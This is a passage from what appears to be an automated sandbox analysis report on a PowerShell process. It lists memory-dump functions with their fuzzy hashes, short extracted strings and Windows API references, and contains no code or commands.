Opcode Fuzzy Hash: 78db95aba3dc4401d59f52dbfd531e1dccdd64d32ac375ad2b3b6cc8e8a7e8e3
Instruction Fuzzy Hash: B111EDB5C106599BDB10DF9AD544BDEFBF4FB48314F20816AD828A7240D3B8AA05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 085F3CE0 Relevance: 1.7, Instructions: 1717COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921177147.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_85f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afbead4bdc2af8253187c80dd5a9cf6f9683bbe573b2f6cb6f6daad1f1369f87
Instruction ID: 4bce1f601be01cee5c2a3062abf0cd588b1153a7ef8389ece3efe3bdb580219e
Opcode Fuzzy Hash: afbead4bdc2af8253187c80dd5a9cf6f9683bbe573b2f6cb6f6daad1f1369f87
Instruction Fuzzy Hash: 12E2FA70B41314DFDB29AB74C811B6E76A2AB85309F2088BDE5069F3D1DB76DC82CB45

Uniqueness

Uniqueness Score: -1.00%

Function 079DDB40 Relevance: 1.7, Strings: 1, Instructions: 461COMMON

Download Yara Rule

Strings

+%, xrefs: 079DDE3C

Memory Dump Source

Source File: 00000003.00000002.918429917.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: +%
API String ID: 0-3645226418
Opcode ID: 719c92c45bbbbe09f1d7e21cadee0476ca7a5cfc23f8a3c5407ee122d32c3d25
Instruction ID: 940c9b193e5e7f5f61c28c64cc974c15d3a5ec586b44173c77b09ac3a24a67ae
Opcode Fuzzy Hash: 719c92c45bbbbe09f1d7e21cadee0476ca7a5cfc23f8a3c5407ee122d32c3d25
Instruction Fuzzy Hash: 5E025A75B002099FDB14DFA9C484A9EBBBAFF88350F15C119E80A9B355DB70ED46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 087125A8 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

^Et, xrefs: 08712B80

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID: ^Et
API String ID: 0-2134091200
Opcode ID: e39a4a175c9e6c9a66ed87ac590f7d33a94700897bc435f51d0a854c5d23e868
Instruction ID: 19bb2a3be6c7d30c3fecad9dd750f3246507236b3f3257a67a721404f25b2ad2
Opcode Fuzzy Hash: e39a4a175c9e6c9a66ed87ac590f7d33a94700897bc435f51d0a854c5d23e868
Instruction Fuzzy Hash: CBA12A34A14208CFCF18DF69D594AADB7F2EF88311F198469E406AB765DB34ED42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0863C548 Relevance: .9, Instructions: 916COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921488412.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bb730185d63b3ecd5e26675e7027019e8bebd9c450129b76ac680ad41fe2502
Instruction ID: 26c46ad2670e570c6d192b729b15f4b72a4138d3e5f93f13b29107d6942423de
Opcode Fuzzy Hash: 1bb730185d63b3ecd5e26675e7027019e8bebd9c450129b76ac680ad41fe2502
Instruction Fuzzy Hash: 2D624D70741300DFEB65AB748815B6E76A2ABC5708F2484BDE1069F3D5DEB6DC82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0863C538 Relevance: .9, Instructions: 890COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921488412.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd517f4ca804d4d5f12ef68c1f0d7074ab820215132201e3ffcf5d4a5f973af
Instruction ID: b44ce9ae9b731b07d6ec1f42cf852ab60ef1a55abc7ad52ce9bed58edd23f4f8
Opcode Fuzzy Hash: 3fd517f4ca804d4d5f12ef68c1f0d7074ab820215132201e3ffcf5d4a5f973af
Instruction Fuzzy Hash: 73622C70741300DFEB69AB348815B6E76A2ABC5708F2484BDE5069F3D5DEB6DC82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0863D5F0 Relevance: .8, Instructions: 782COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921488412.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7b640f643299b65d24539d4fa86c279784841873df6dde8e1a8c2333b9e615
Instruction ID: 7a64695d64a580b805b018ea1c1282ff978d61ae209522f0bd829df298218119
Opcode Fuzzy Hash: 4c7b640f643299b65d24539d4fa86c279784841873df6dde8e1a8c2333b9e615
Instruction Fuzzy Hash: EA423B70740310DFEB29AB748812B6E76A3ABC5704F24887DE5069F3D1DEB69C42DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0863D70F Relevance: .7, Instructions: 739COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921488412.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fa18db44bd0f089ed83fc75d079465e68f7210ead18d3d945a564ccb0e2d97b
Instruction ID: c79d2dd57d79184e79e1f42731bffc42fb98954dd388e9d3102a271e0e210f97
Opcode Fuzzy Hash: 7fa18db44bd0f089ed83fc75d079465e68f7210ead18d3d945a564ccb0e2d97b
Instruction Fuzzy Hash: EF422B70741310DFEB29AB748812B6E76A3ABC5704F24887DE5069F3D1DEB69C42DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0863D760 Relevance: .7, Instructions: 721COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921488412.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c801188d9b71d62376d5ad9624683906b76cc8a24c30d4a9dcc3f63e361eff
Instruction ID: c0fb259fee046bf0f26dc244bf901ac3f87af137e4d1ddf0bf60246372cc1595
Opcode Fuzzy Hash: a3c801188d9b71d62376d5ad9624683906b76cc8a24c30d4a9dcc3f63e361eff
Instruction Fuzzy Hash: BF420B70741310DFEB29AB708812B6E76A3ABC5708F24887DE5069F3D5DEB69C42DB41

Uniqueness

Uniqueness Score: -1.00%

Function 07CB85C8 Relevance: .7, Instructions: 698COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.918559537.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7cb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29dc7ed718d6311333c78d6be54f99da082f9e5f9e1d15bf84c54325ec5813a5
Instruction ID: a731cb2be5ce5bfe767fb4c7bf1629ce3e0d21a86a4f7e6cec39dae919b64111
Opcode Fuzzy Hash: 29dc7ed718d6311333c78d6be54f99da082f9e5f9e1d15bf84c54325ec5813a5
Instruction Fuzzy Hash: 14524FB060020ADFDB24DF64C890BDE77F6AF89304F5485A9E909AB251DB35EE45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0820D6C0 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.919255845.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8200000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1341f66e3cee136e85385177168812900d27af17a9144e183c29dc044bab0fb5
Instruction ID: 283e8dd50a9e03ad79a72aea2f85bbc484b0f843fc03e1cd73e13ff1bcd63cda
Opcode Fuzzy Hash: 1341f66e3cee136e85385177168812900d27af17a9144e183c29dc044bab0fb5
Instruction Fuzzy Hash: 55424E34A10319DBEB159B64C851BA9B776FF89300F10C5A9E9097B392DF71AD81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 08601BC8 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921250353.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6819486a8031f0e21719f95e57ac10cee9dac10a24d8204b444f67638af1e605
Instruction ID: 10ce099374257a984c8b95e98d2fd97a02b8f4b2a731b520260440b5e549d7be
Opcode Fuzzy Hash: 6819486a8031f0e21719f95e57ac10cee9dac10a24d8204b444f67638af1e605
Instruction Fuzzy Hash: 39E18D34B002049FDB09DF68D494AAEBBF6FF88341F158429E9059B3A5DB74DD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0820D6B0 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.919255845.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8200000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3f711af021e9be0d2cf62ec148f3969a2e66fa41f38ae511dc4f08b9cfa34e0
Instruction ID: 1713aff2e23d2533367c64256e013c58d6c73c457122446c0622c2d8c8edbbcc
Opcode Fuzzy Hash: b3f711af021e9be0d2cf62ec148f3969a2e66fa41f38ae511dc4f08b9cfa34e0
Instruction Fuzzy Hash: 89E17D34A10319DFEB159B64C850BAAB776FF89301F1085A9E5097B392DF71AD81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 087473E8 Relevance: 7.6, Strings: 6, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ld>t, xrefs: 08747471
Ld>t, xrefs: 087474F6
Ld>t, xrefs: 08747442
Ld>t, xrefs: 08747436
Ld>t, xrefs: 0874747D
Ld>t, xrefs: 087474EA

Memory Dump Source

Source File: 00000003.00000002.922615314.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8740000_powershell.jbxd

Similarity

API ID:
String ID: Ld>t$Ld>t$Ld>t$Ld>t$Ld>t$Ld>t
API String ID: 0-64380967
Opcode ID: 391b553aed502b3fa641d9859f578228360902ccdd97a370084e5196dc24e00f
Instruction ID: fcb011a2b0695849b75654ea0a980b287f11807aec1b0a3cfe8a0fe64cea8cb8
Opcode Fuzzy Hash: 391b553aed502b3fa641d9859f578228360902ccdd97a370084e5196dc24e00f
Instruction Fuzzy Hash: 4E316E34700218CFD718DEB9D544A3677EAEFC82927295469E50ACB3A9DF71DC028B72

Uniqueness

Uniqueness Score: -1.00%

Function 08748840 Relevance: 6.5, Strings: 5, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Et, xrefs: 08748A0C
^Et, xrefs: 08748B17
"Et, xrefs: 08748A40
"Et, xrefs: 08748B4B
^Et, xrefs: 08748BCF

Memory Dump Source

Source File: 00000003.00000002.922615314.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8740000_powershell.jbxd

Similarity

API ID:
String ID: "Et$"Et$^Et$^Et$^Et
API String ID: 0-783043182
Opcode ID: d2d24b039ea3d6e0a4ed6d68b89f9ae24d1391122120a7aaa12c34d44bc648e3
Instruction ID: 3055e6164ed333e9017f982625595d86a4805f7cdb889206c549f31826e770c5
Opcode Fuzzy Hash: d2d24b039ea3d6e0a4ed6d68b89f9ae24d1391122120a7aaa12c34d44bc648e3
Instruction Fuzzy Hash: 02B15F35B002059FEB14DF64D894BAEB7A6EFC8300F148529E50AAB395DF75ED02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0820B3E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNEL32(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 0820B508

Strings

>sRR, xrefs: 0820B413
>sRR, xrefs: 0820B433

Memory Dump Source

Source File: 00000003.00000002.919255845.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8200000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID: >sRR$>sRR
API String ID: 2489174969-2831357870
Opcode ID: 9d1743160199794a41660ddaef31145747be65f676a95b0a6784a307821f5e2b
Instruction ID: 2a5bc7c889c66d701d94dedb14d1cd5db3e0e54827c257ec28b0cdc5d442d084
Opcode Fuzzy Hash: 9d1743160199794a41660ddaef31145747be65f676a95b0a6784a307821f5e2b
Instruction Fuzzy Hash: 0C5103B1D11319DFDB24CFA9D984B9DFBF2AF48310F24812AE408AB2A1D7759981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 08717293 Relevance: 5.4, Strings: 4, Instructions: 360
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

k, xrefs: 087176F4
k, xrefs: 087176D6
k, xrefs: 08717730
^Et, xrefs: 08717303

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID: ^Et$k$k$k
API String ID: 0-3923943871
Opcode ID: 8a652b6075c383430d4bc01959b070b2d98361351f2b76638ddb8479845ceb1f
Instruction ID: 7ec21cbcb5f9b1f1f77adbd0441d793f1600db5b03d2e03093c62b623beeb93a
Opcode Fuzzy Hash: 8a652b6075c383430d4bc01959b070b2d98361351f2b76638ddb8479845ceb1f
Instruction Fuzzy Hash: A4D1AA34B00205CFDF18EFA8D4946AEB7A2EF88352F10892DD5069B749DB74ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD468 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>sRR, xrefs: 00BCD65E

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID: >sRR
API String ID: 0-1794083209
Opcode ID: fce3533baf1db388f356ab8f4975d7c3ccf1eff4527879620ae0ec3ed1290395
Instruction ID: 7e37e69fa796e0ed139ea9d1e414c06236b171260f8d221c238985b54f2c251b
Opcode Fuzzy Hash: fce3533baf1db388f356ab8f4975d7c3ccf1eff4527879620ae0ec3ed1290395
Instruction Fuzzy Hash: FD914C70E003599FEB25DFA5C844BADBBF5EF48304F1084AAD409AB291DB759D85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BCF8C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>sRR, xrefs: 00BCF987

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID: >sRR
API String ID: 823142352-1794083209
Opcode ID: 003df5d1eb9039cb2aeb08abf7960c43c769a9fc84d3fc14533b1fdd52e513e9
Instruction ID: 32792503842b9280a18baeff94c391d500c5a1b773b0bc20fa481f12f6c27e5c
Opcode Fuzzy Hash: 003df5d1eb9039cb2aeb08abf7960c43c769a9fc84d3fc14533b1fdd52e513e9
Instruction Fuzzy Hash: E2419271A00209AFDB14CFA9D845BEEFBF5FF48310F1481A9E905AB381D7749941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BCCA44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 00BCD72A

Strings

>sRR, xrefs: 00BCD65E

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: AuthzCodeIdentifyLevel
String ID: >sRR
API String ID: 1431151113-1794083209
Opcode ID: 4a5ec080a4c66345c778f759f6820e0f06447fdd74d6249a7171313a6e2016d8
Instruction ID: 441cba728078cae351296c8c05944d035decaef5b095dda5281d24692643fd61
Opcode Fuzzy Hash: 4a5ec080a4c66345c778f759f6820e0f06447fdd74d6249a7171313a6e2016d8
Instruction Fuzzy Hash: C141D074901269CFEB24CF59C984BD9BBF4AB08304F1085EAD80DA7250D7759E89CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0866DDD1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadUILanguage.KERNELBASE ref: 0866DE82

Strings

>sRR, xrefs: 0866DE3A

Memory Dump Source

Source File: 00000003.00000002.921771438.0000000008660000.00000040.00000800.00020000.00000000.sdmp, Offset: 08660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8660000_powershell.jbxd

Similarity

API ID: LanguageThread
String ID: >sRR
API String ID: 243849632-1794083209
Opcode ID: b558f6814a4d65febacc749c70d1667d778dd87c5115a59fbc77de99c8eaf2cc
Instruction ID: be76038087608eade15a5ba3bce2c4597180e9d8b48ebe52b416faab87865724
Opcode Fuzzy Hash: b558f6814a4d65febacc749c70d1667d778dd87c5115a59fbc77de99c8eaf2cc
Instruction Fuzzy Hash: 1E218DB08097C88FCB12CFA9D8447DEBFF4AF1A214F15849FC448AB2A2D3749545CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCF960 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,C0000000,?,?,?,?,?,?,?,?,00BCF8DF,00000000,00000000,00000003,00000000,00000002), ref: 00BCF9EA

Strings

>sRR, xrefs: 00BCF987

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID: >sRR
API String ID: 823142352-1794083209
Opcode ID: 9c4d0054d61836294b8c45eaeb0b763183def4955f5b4861ccaab294b1885551
Instruction ID: 3f58102928cc2409b3798994d8228f584c6dbe0c17223d9f8b303fea68f16c75
Opcode Fuzzy Hash: 9c4d0054d61836294b8c45eaeb0b763183def4955f5b4861ccaab294b1885551
Instruction Fuzzy Hash: E621287690024AAFDB10CF9AD844BDEFBF4FB08310F14816AE919A7250D374A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BCF56C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,?,?,?,?,?,?,?,?,00BCF8DF,00000000,00000000,00000003,00000000,00000002), ref: 00BCF9EA

Strings

>sRR, xrefs: 00BCF987

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID: >sRR
API String ID: 823142352-1794083209
Opcode ID: 184184aeac120e067871309acdde790a2912728f7304aa4175c9758aa138370e
Instruction ID: eab8e62a52747914a10c55132b9a62a6db4beca0d929653059580257ac9ed7b8
Opcode Fuzzy Hash: 184184aeac120e067871309acdde790a2912728f7304aa4175c9758aa138370e
Instruction Fuzzy Hash: 19212AB190020AABCB10CF99D844BEEFBF5FB08310F14816AE915A7350C3749950CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 00BCCA50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 00BCD866

Strings

>sRR, xrefs: 00BCD80F

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: AccessAuthzCodeComputeFromLevelToken
String ID: >sRR
API String ID: 132034935-1794083209
Opcode ID: 68357130ac02539ff813d1a0f0abcc5db50fd5b7510d9e1ecab5def05dcb512f
Instruction ID: e8e1d674d246f080fdbb6fff2a8e02242d2b384334cf9e62c9c72bb2004a9cfc
Opcode Fuzzy Hash: 68357130ac02539ff813d1a0f0abcc5db50fd5b7510d9e1ecab5def05dcb512f
Instruction Fuzzy Hash: FB2118768002499FDB10CF9AC444BDEBBF4EB48310F10846AE918A7350D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD7EE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 00BCD866

Strings

>sRR, xrefs: 00BCD80F

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: AccessAuthzCodeComputeFromLevelToken
String ID: >sRR
API String ID: 132034935-1794083209
Opcode ID: 50811e3dd475be2b20e1413cea26f11c415ec1e95870bc52aa668c0a8c8ee488
Instruction ID: c59815f9415e7c6ed019ad654359f659fe2dee89b1f53a90566efe9e7958087b
Opcode Fuzzy Hash: 50811e3dd475be2b20e1413cea26f11c415ec1e95870bc52aa668c0a8c8ee488
Instruction Fuzzy Hash: 5321F7B68002499FDB10CFAAD544BDEFBF4EB48310F15846AE918A7250D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4B59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 00BC4BD0

Strings

>sRR, xrefs: 00BC4B7F

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID: >sRR
API String ID: 3188754299-1794083209
Opcode ID: eff64150a6ae247adac941ccf1005d31ffecdde7e4f586cd00f6a0bbf715b939
Instruction ID: 9372e2c8fdd2a7bf0d9be2f2e51ff1a732de38d39a0b5744827a728158909cee
Opcode Fuzzy Hash: eff64150a6ae247adac941ccf1005d31ffecdde7e4f586cd00f6a0bbf715b939
Instruction Fuzzy Hash: AB2110B1C046599BDB14CFAAD544B9EFBF4EB48210F1081AAD818A7250C778AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3CD8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 00BC4BD0

Strings

>sRR, xrefs: 00BC4B7F

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID: >sRR
API String ID: 3188754299-1794083209
Opcode ID: 56df78b8a31cc58ac85816990cc81c3f0d7ff71b4d92e12743258c667b6804de
Instruction ID: b0e140f15a0123ac492c5c55aab9feb910e1cc3220cfdfc5ab954c2139cea9bf
Opcode Fuzzy Hash: 56df78b8a31cc58ac85816990cc81c3f0d7ff71b4d92e12743258c667b6804de
Instruction Fuzzy Hash: 0B2133B5D0465A9BDB14CFAAD544B9EFBF4EB48310F1081AAD818B7340D374AA40CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 00BCDC21 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00BCDC8F

Strings

>sRR, xrefs: 00BCDC47

Memory Dump Source

Source File: 00000003.00000002.909926416.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bc0000_powershell.jbxd

Similarity

API ID: InfoSystem
String ID: >sRR
API String ID: 31276548-1794083209
Opcode ID: 8440c36e2284c79f6c7a3e8195f44a875dc31aa77aee3c65be9ca95eb594f6c4
Instruction ID: 85a4f7533372311be6ea3aa85248bea5e8e551d3bd8e7bfea8f14c3c93e2fe22
Opcode Fuzzy Hash: 8440c36e2284c79f6c7a3e8195f44a875dc31aa77aee3c65be9ca95eb594f6c4
Instruction Fuzzy Hash: C21134B5C002499FDB14CF9AD544BDEFBF4EB48310F14816AD818A3340D3B8AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0866AEA4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

SetThreadUILanguage.KERNELBASE ref: 0866DE82

Strings

>sRR, xrefs: 0866DE3A

Memory Dump Source

Source File: 00000003.00000002.921771438.0000000008660000.00000040.00000800.00020000.00000000.sdmp, Offset: 08660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8660000_powershell.jbxd

Similarity

API ID: LanguageThread
String ID: >sRR
API String ID: 243849632-1794083209
Opcode ID: 4b85abbc252d6cb58fc55af9b9321adfe87e219d2bfedea02c63161022e2282f
Instruction ID: b45ca7723294b73b55fa2e94deb0ef703e4b5670c31cfd83a1a85fd5c2080b45
Opcode Fuzzy Hash: 4b85abbc252d6cb58fc55af9b9321adfe87e219d2bfedea02c63161022e2282f
Instruction Fuzzy Hash: 221136B59006888FDB10DF9AD484BEFFBF8EB58324F20845AD518A7350C379A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 087147D8 Relevance: 2.8, Strings: 2, Instructions: 347COMMON

Download Yara Rule

Strings

k, xrefs: 08714C92
^Et, xrefs: 08714A24

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID: ^Et$k
API String ID: 0-3827694010
Opcode ID: 94359957aba8d5b4485d75bcccd9ec99026605d80c80ce8c860a6a0069bf7bc0
Instruction ID: b34656e59260382ec4fe175b9f0f05050c9d793347d85aefe21c8459be13ca69
Opcode Fuzzy Hash: 94359957aba8d5b4485d75bcccd9ec99026605d80c80ce8c860a6a0069bf7bc0
Instruction Fuzzy Hash: 9CF12474E00209DFDB14DFA8D584A9DBBF2EF88305F158129E409AB369DB34AD42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0871D3B0 Relevance: 2.8, Strings: 2, Instructions: 262COMMON

Download Yara Rule

Strings

^Et, xrefs: 0871D449
^Et, xrefs: 0871D55D

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID: ^Et$^Et
API String ID: 0-947825624
Opcode ID: c3898c8a2928ef32c33e941294d962daf1549b4bb444c98656570790f7c82494
Instruction ID: 8d256404bc57f8dfa2ef1b7ea98531f853b8d533b45755d2f08f4909cec67205
Opcode Fuzzy Hash: c3898c8a2928ef32c33e941294d962daf1549b4bb444c98656570790f7c82494
Instruction Fuzzy Hash: 4AA14E35B00218DFDF14DFA8D894AADBBB2BF88301F108529E406A7755DB35AD46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 08290938 Relevance: 2.7, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

<N1, xrefs: 08290B7D
hN1, xrefs: 08290B87

Memory Dump Source

Source File: 00000003.00000002.919379098.0000000008290000.00000040.00000800.00020000.00000000.sdmp, Offset: 08290000, based on PE: false

